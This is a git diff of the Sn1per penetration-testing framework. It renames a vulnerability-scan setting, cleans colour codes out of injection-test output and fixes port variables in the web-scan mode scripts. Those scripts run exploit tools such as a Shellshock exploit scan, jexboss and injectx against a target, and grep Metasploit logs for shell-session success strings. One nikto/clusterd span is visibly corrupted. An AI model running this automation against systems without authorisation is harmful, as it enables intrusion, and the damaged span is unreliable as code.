diff --git a/CHANGELOG.md b/CHANGELOG.md index ab0b5aff..0934baf4 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,4 +1,6 @@ ## CHANGELOG: +* v9.0 - Added Fortinet FortiGate SSL VPN Panel Detected sc0pe template +* v9.0 - Added CVE-2020-17519 - Apache Flink Path Traversal sc0pe template * v9.0 - Added RabbitMQ Management Interface Detected sc0pe template * v9.0 - Added CVE-2020-29583 Zyxel SSH Hardcoded Credentials via BruteX * v9.0 - Removed vulnscan NMap CSV updates/downloads to save space/bandwidth @@ -7,6 +9,7 @@ * v9.0 - Added Wordpress WPScan sc0pe vulnerability parser * v9.0 - Fixed issue with wrong WPscan API key command * v9.0 - Added CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal sc0pe template +* v9.0 - Renamed AUTO_VULNSCAN setting to "VULNSCAN" in sniper.conf to perform vulnerability scans via 'normal' mode * v8.9 - Tuned sniper.conf around performance for all scans and recon modes * v8.9 - Added out of scope options to config * v8.9 - Added automatic HTTP/HTTPS web scans and vulnerability scans to 'normal' mode diff --git a/README.md b/README.md index 01329dba..8b6dbe38 100644 --- a/README.md +++ b/README.md @@ -129,7 +129,7 @@ sniper -c /path/to/sniper.conf -t -w sniper -u|--update ``` -## MODES: +## MODES * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance. * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking. * **FLYOVER:** Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly). diff --git a/modes/normal.sh b/modes/normal.sh index bda2313e..600bb79c 100644 --- a/modes/normal.sh +++ b/modes/normal.sh @@ -1201,9 +1201,9 @@ else fi fi -if [[ "$AUTO_VULNSCAN" = "1" ]]; then +if [[ "$VULNSCAN" = "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - echo -e "$OKRED PERFORMING AUTO VULNSCAN $RESET" + echo -e "$OKRED PERFORMING VULNERABILITYSCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" sniper -t $TARGET -m vulnscan -w $WORKSPACE fi diff --git a/modes/normal_webporthttp.sh b/modes/normal_webporthttp.sh index 6872f396..868a8611 100644 --- a/modes/normal_webporthttp.sh +++ b/modes/normal_webporthttp.sh @@ -59,9 +59,10 @@ wpif [[ "$MODE" = "web" ]]; then fi fi if [[ "$INJECTX" == "1" ]]; then - rm -f $LOOT_DIR/web/injectx-$TARGET-http.txt 2> /dev/null + rm -f $LOOT_DIR/web/injectx-$TARGET-http.raw 2> /dev/null #cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep 'http\:' | xargs -P $THREADS -r -n 1 -I '{}' injectx.py -u '{}' -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http.txt - for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "http\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "http\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http.txt; done; done; + for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "http\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "http\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http.raw; done; done; + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/injectx-$TARGET-http.raw 2> /dev/null > $LOOT_DIR/web/injectx-$TARGET-http.txt fi source $INSTALL_DIR/modes/static-grep-search.sh if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then diff --git a/modes/normal_webporthttps.sh b/modes/normal_webporthttps.sh index ff675024..928dc5b5 100644 --- a/modes/normal_webporthttps.sh +++ b/modes/normal_webporthttps.sh @@ -57,8 +57,9 @@ if [[ "$MODE" = "web" ]]; then fi fi if [[ "$INJECTX" == "1" ]]; then - rm -f $LOOT_DIR/web/injectx-$TARGET-https.txt 2> /dev/null - for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "https\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "https\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-https.txt; done; done; + rm -f $LOOT_DIR/web/injectx-$TARGET-https.raw 2> /dev/null + for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "https\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "https\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-https.raw; done; done; + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/injectx-$TARGET-https.raw 2> /dev/null > $LOOT_DIR/web/injectx-$TARGET-https.txt fi source $INSTALL_DIR/modes/static-grep-search.sh if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then diff --git a/modes/webporthttp.sh b/modes/webporthttp.sh index cdda0357..9ea4b8ea 100644 --- a/modes/webporthttp.sh +++ b/modes/webporthttp.sh @@ -212,9 +212,10 @@ if [[ "$MODE" = "webporthttp" ]]; then fi fi if [[ "$INJECTX" == "1" ]]; then - rm -f $LOOT_DIR/web/injectx-$TARGET-http.txt 2> /dev/null + rm -f $LOOT_DIR/web/injectx-$TARGET-http-${PORT}.raw 2> /dev/null #cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep 'http\:' | xargs -P $THREADS -r -n 1 -I '{}' injectx.py -u '{}' -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http.txt - for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "http\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "http\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http.txt; done; done; + for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "http\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "http\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http-${PORT}.raw; done; done; + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/injectx-$TARGET-http-${PORT}.raw 2> /dev/null > $LOOT_DIR/web/injectx-$TARGET-http-${PORT}.txt fi source $INSTALL_DIR/modes/static-grep-search.sh if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then @@ -272,20 +273,20 @@ if [[ "$MODE" = "webporthttp" ]]; then if [[ "$GOBUSTER" == "1" ]]; then sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null fi - wget --connect-timeout=5 --read-timeout=10 --tries=1 http://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-http.txt 2> /dev/null + wget --connect-timeout=5 --read-timeout=10 --tries=1 http://$TARGET:${PORT}/robots.txt -O $LOOT_DIR/web/robots-$TARGET:${PORT}-http.txt 2> /dev/null if [[ "$CLUSTERD" == "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - clusterd -i $TARGET -p $PORT | tee $LOOT_DIR/web/clusterd-$TARGET-port$PORT.txt + clusterd -i $TARGET -p ${PORT} | tee $LOOT_DIR/web/clusterd-$TARGET-port${PORT}.txt fi if [[ "$CMSMAP" == "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED RUNNING CMSMAP $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - cmsmap http://$TARGET:$PORT | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port$PORTa.txt + cmsmap http://$TARGET:${PORT} | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port${PORT}a.txt echo "" - cmsmap http://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port$PORTb.txt + cmsmap http://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port${PORT}b.txt echo "" fi if [[ "$WPSCAN" == "1" ]]; then @@ -293,60 +294,60 @@ if [[ "$MODE" = "webporthttp" ]]; then echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" if [[ "$WP_API_KEY" ]]; then - wpscan --url http://$TARGET:$PORT --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTa.raw + wpscan --url http://$TARGET:${PORT} --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}a.raw echo "" - wpscan --url http://$TARGET:$PORT/wordpress/ --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTb.raw + wpscan --url http://$TARGET:${PORT}/wordpress/ --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}b.raw echo "" else - wpscan --url http://$TARGET:$PORT --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTa.raw + wpscan --url http://$TARGET:${PORT} --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}a.raw echo "" - wpscan --url http://$TARGET:$PORT/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTb.raw + wpscan --url http://$TARGET:${PORT}/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}b.raw fi - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTa.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTa.txt - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTb.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTb.txt + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}a.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}a.txt + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}b.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}b.txt rm -f $LOOT_DIR/web/wpscan-$TARGET-http*.raw 2> /dev/null fi if [[ "$NIKTO" == "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - nikto -h http://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-http-port$PORT.txt - sed -ir "s/ /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-http-port$PORT.txt + clusterd -i $TARGET -p ${PORT} 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-http-port${PORT}.txt fi if [[ "$SHOCKER" == "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port $PORT | tee $LOOT_DIR/web/shocker-$TARGET-port$PORT.txt + python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port ${PORT} | tee $LOOT_DIR/web/shocker-$TARGET-port${PORT}.txt fi if [[ "$JEXBOSS" == "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED RUNNING JEXBOSS $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" cd /tmp/ - python /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET:$PORT | tee $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw > $LOOT_DIR/web/jexboss-$TARGET-port$PORT.txt 2> /dev/null - rm -f $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw 2> /dev/null + python /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET:${PORT} | tee $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw > $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.txt 2> /dev/null + rm -f $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw 2> /dev/null cd $INSTALL_DIR fi if [[ "$SMUGGLER" = "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED RUNNING HTTP REQUEST SMUGGLING DETECTION $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - python3 /usr/share/sniper/plugins/smuggler/smuggler.py --no-color -u http://$TARGET:$PORT | tee $LOOT_DIR/web/smuggler-$TARGET-port${PORT}.txt + python3 /usr/share/sniper/plugins/smuggler/smuggler.py --no-color -u http://$TARGET:${PORT} | tee $LOOT_DIR/web/smuggler-$TARGET-port${PORT}.txt fi if [[ "$NUCLEI" = "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED RUNNING NUCLEI SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - nuclei -silent -t /usr/share/sniper/plugins/nuclei-templates/ -c $THREADS -target http://$TARGET:$PORT -o $LOOT_DIR/web/nuclei-http-${TARGET}-port${PORT}.txt + nuclei -silent -t /usr/share/sniper/plugins/nuclei-templates/ -c $THREADS -target http://$TARGET:${PORT} -o $LOOT_DIR/web/nuclei-http-${TARGET}-port${PORT}.txt fi SSL="false" source $INSTALL_DIR/modes/web_autopwn.sh @@ -378,79 +379,79 @@ if [[ "$MODE" = "webporthttp" ]]; then curl -s "http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a" | jq '.issue_events[].issue | "[" + .severity + "] " + .name + " - " + .origin + .path' | sort -u | sed 's/\"//g' | tee $LOOT_DIR/web/burpsuite-$TARGET-$a.txt done echo "[-] Done!" - fi + fi - if [[ "$ZAP_SCAN" == "1" ]]; then - echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - echo -e "$OKRED RUNNING OWASP ZAP SCAN $RESET" + if [[ "$ZAP_SCAN" == "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - echo "[i] Scanning: http://$TARGET:$PORT/" - sudo python3 /usr/share/sniper/bin/zap-scan.py "http://$TARGET:$PORT/" - DATE=$(date +"%Y%m%d%H%M") - sudo grep "'" /usr/share/sniper/bin/zap-report.txt | cut -d\' -f2 | cut -d\\ -f1 > $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html - cp -f $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html $LOOT_DIR/web/zap-report-$TARGET-http.html 2> /dev/null - echo "[i] Scan complete." - echo "[+] Report saved to: $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html" - fi - - if [[ "$ARACHNI_SCAN" == "1" ]]; then - echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - echo -e "$OKRED RUNNING ARACHNI SCAN $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - DATE=$(date +"%Y%m%d%H%M") - mkdir -p $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ - arachni --report-save-path=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ --output-only-positives http://$TARGET:$PORT | tee ${LOOT_DIR}/web/arachni_webscan_${TARGET}_${PORT}_${DATE}.txt + echo -e "$OKRED RUNNING OWASP ZAP SCAN $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo "[i] Scanning: http://$TARGET:$PORT/" + sudo python3 /usr/share/sniper/bin/zap-scan.py "http://$TARGET:$PORT/" + DATE=$(date +"%Y%m%d%H%M") + sudo grep "'" /usr/share/sniper/bin/zap-report.txt | cut -d\' -f2 | cut -d\\ -f1 > $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html + cp -f $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html $LOOT_DIR/web/zap-report-$TARGET-http.html 2> /dev/null + echo "[i] Scan complete." + echo "[+] Report saved to: $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html" + fi - cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ - arachni_reporter $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/*.afr --report=html:outfile=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/arachni.zip - cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ - unzip arachni.zip - cd $INSTALL_DIR - fi + if [[ "$ARACHNI_SCAN" == "1" ]]; then + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED RUNNING ARACHNI SCAN $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + DATE=$(date +"%Y%m%d%H%M") + mkdir -p $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ + arachni --report-save-path=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ --output-only-positives http://$TARGET:$PORT | tee ${LOOT_DIR}/web/arachni_webscan_${TARGET}_${PORT}_${DATE}.txt - if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then - echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - SSL="false" - source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh - source $INSTALL_DIR/modes/sc0pe-active-webscan.sh - for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do - source $file - done - source $INSTALL_DIR/modes/sc0pe-network-scan.sh - echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - fi - - source $INSTALL_DIR/modes/sc0pe.sh + cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ + arachni_reporter $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/*.afr --report=html:outfile=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/arachni.zip + cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ + unzip arachni.zip cd $INSTALL_DIR + fi + if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - echo -e "$OKRED SCAN COMPLETE! $RESET" + echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - echo "$TARGET" >> $LOOT_DIR/scans/updated.txt - rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null - ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt - rm -f $INSTALL_DIR/.fuse_* 2> /dev/null - VULNERABLE_METASPLOIT=$(egrep -h -i -s "may be vulnerable|is vulnerable|IKE response with leak|File saved in" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null) - if [[ ${#VULNERABLE_METASPLOIT} -ge 5 ]]; then - echo "$VULNERABLE_METASPLOIT" > $LOOT_DIR/output/vulnerable-metasploit-$TARGET.txt 2> /dev/null - fi - VULNERABLE_SHELLSHOCK=$(egrep -h -i -s "The following URLs appear to be exploitable:" $LOOT_DIR/web/shocker-$TARGET-*.txt 2> /dev/null) - if [[ ${#VULNERABLE_SHELLSHOCK} -ge 5 ]]; then - echo "$VULNERABLE_SHELLSHOCK" > $LOOT_DIR/output/vulnerable-shellshock-$TARGET.txt 2> /dev/null - fi - SHELLED=$(egrep -h -i -s "Meterpreter session|Command executed|File(s) found:|Command Stager progress|File uploaded|Command shell session" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null) - if [[ ${#SHELLED} -ge 5 ]]; then - echo "$SHELLED" > $LOOT_DIR/output/shelled-$TARGET.txt 2> /dev/null - fi - - echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt - if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then - /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" - fi - if [[ "$LOOT" = "1" ]]; then - loot - fi - exit - fi \ No newline at end of file + SSL="false" + source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh + source $INSTALL_DIR/modes/sc0pe-active-webscan.sh + for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do + source $file + done + source $INSTALL_DIR/modes/sc0pe-network-scan.sh + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + fi + + source $INSTALL_DIR/modes/sc0pe.sh + cd $INSTALL_DIR + + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED SCAN COMPLETE! $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo "$TARGET" >> $LOOT_DIR/scans/updated.txt + rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null + ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt + rm -f $INSTALL_DIR/.fuse_* 2> /dev/null + VULNERABLE_METASPLOIT=$(egrep -h -i -s "may be vulnerable|is vulnerable|IKE response with leak|File saved in" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null) + if [[ ${#VULNERABLE_METASPLOIT} -ge 5 ]]; then + echo "$VULNERABLE_METASPLOIT" > $LOOT_DIR/output/vulnerable-metasploit-$TARGET.txt 2> /dev/null + fi + VULNERABLE_SHELLSHOCK=$(egrep -h -i -s "The following URLs appear to be exploitable:" $LOOT_DIR/web/shocker-$TARGET-*.txt 2> /dev/null) + if [[ ${#VULNERABLE_SHELLSHOCK} -ge 5 ]]; then + echo "$VULNERABLE_SHELLSHOCK" > $LOOT_DIR/output/vulnerable-shellshock-$TARGET.txt 2> /dev/null + fi + SHELLED=$(egrep -h -i -s "Meterpreter session|Command executed|File(s) found:|Command Stager progress|File uploaded|Command shell session" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null) + if [[ ${#SHELLED} -ge 5 ]]; then + echo "$SHELLED" > $LOOT_DIR/output/shelled-$TARGET.txt 2> /dev/null + fi + + echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt + if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + if [[ "$LOOT" = "1" ]]; then + loot + fi + exit +fi \ No newline at end of file diff --git a/modes/webporthttps.sh b/modes/webporthttps.sh index a0bc576d..4d28d692 100644 --- a/modes/webporthttps.sh +++ b/modes/webporthttps.sh @@ -228,9 +228,10 @@ if [[ "$MODE" = "webporthttps" ]]; then fi fi if [[ "$INJECTX" == "1" ]]; then - rm -f $LOOT_DIR/web/injectx-$TARGET-https.txt 2> /dev/null + rm -f $LOOT_DIR/web/injectx-$TARGET-https-${PORT}.raw 2> /dev/null #cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep 'https\:' | xargs -P $THREADS -r -n 1 -I '{}' injectx.py -u '{}' -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-https.txt - for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "https\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "https\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-https.txt; done; done; + for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "https\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "https\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-https-${PORT}.txt; done; done; + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/injectx-$TARGET-https-${PORT}.raw 2> /dev/null > $LOOT_DIR/web/injectx-$TARGET-https-${PORT}.txt fi source $INSTALL_DIR/modes/static-grep-search.sh if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then @@ -288,20 +289,20 @@ if [[ "$MODE" = "webporthttps" ]]; then if [[ "$GOBUSTER" == "1" ]]; then sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null fi - wget --connect-timeout=5 --read-timeout=10 --tries=1 https://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-https.txt 2> /dev/null + wget --connect-timeout=5 --read-timeout=10 --tries=1 https://$TARGET:${PORT}/robots.txt -O $LOOT_DIR/web/robots-$TARGET:${PORT}-https.txt 2> /dev/null if [[ "$CLUSTERD" == "1" ]]; then echo -e 